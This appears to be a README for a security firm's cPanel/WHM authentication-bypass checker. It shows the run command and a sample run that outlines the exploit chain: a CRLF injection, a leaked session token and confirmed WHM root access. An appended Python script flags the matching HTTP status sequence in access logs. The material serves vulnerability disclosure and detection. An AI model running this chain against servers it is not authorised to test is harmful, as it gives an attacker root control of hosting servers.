cPanel/WHM Authentication Bypass Detection Artifact Generator Tool
This Detection Artifact Generator checks whether a cPanel/WHM instance is vulnerable to a recent authentication bypass.
Test against a vulnerable instance:
python authbypass-RCE.py --target https://target:2087/
watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
(*) cPanel/WHM Authentication Bypass - Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-Pending]
[0] hostname =
[1] minting a preauth session...
session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.89"}
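One way a defender could search server access logs for the status pattern in the run above (HTTP 307, then 401, then 200 on a session-token `json-api` path, all from one client). This is an added example, not part of the watchTowr tool; the combined-log-style line layout, the 60-second window and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Assumed combined-log-style layout: ip ident user [time] "METHOD path PROTO" status ...
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
API = re.compile(r"^/cpsess\d+/json-api/")  # session-token API path, as in step [4]
WINDOW = timedelta(seconds=60)              # assumed correlation window

# Constructed sample lines (documentation IPs, made-up tokens), not real server logs.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2026:10:00:00 +0000] "GET / HTTP/1.1" 307 0',
    '192.0.2.10 - - [01/Jan/2026:10:00:01 +0000] "GET / HTTP/1.1" 401 0',
    '192.0.2.10 - root [01/Jan/2026:10:00:02 +0000] "GET /cpsess0000000001/json-api/version HTTP/1.1" 200 27',
    '198.51.100.7 - - [01/Jan/2026:10:05:00 +0000] "POST /login/ HTTP/1.1" 200 120',
    '198.51.100.7 - root [01/Jan/2026:10:05:01 +0000] "GET /cpsess0000000002/json-api/version HTTP/1.1" 200 27',
]

def find_sequences(lines, window=WINDOW):
    """Return (ip, path) for each client that got 307, then 401, then 200 on a
    /cpsess<digits>/json-api/ path, with the whole run inside `window`."""
    state = {}  # ip -> (stage, time of the 307 that started the run)
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # line does not fit the assumed layout
        ip, path, status = m["ip"], m["path"], m["status"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        stage, start = state.get(ip, (0, ts))
        if stage and ts - start > window:
            stage = 0  # partial run went stale
        if status == "307":
            state[ip] = (1, ts)        # (re)start a run
        elif stage == 1 and status == "401":
            state[ip] = (2, start)
        elif stage == 2 and status == "200" and API.match(path):
            hits.append((ip, path))
            state.pop(ip, None)
        else:
            state[ip] = (stage, start)
    return hits

if __name__ == "__main__":
    for ip, path in find_sequences(SAMPLE):
        print(f"review {ip}: 307 -> 401 -> 200 on {path}")
```

A hit is a lead for review rather than proof of compromise, since the heuristic keys only on status codes and the token path shape.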
Refer to cPanel website here
Follow watchTowr Labs
For the latest security research follow the watchTowr Labs Team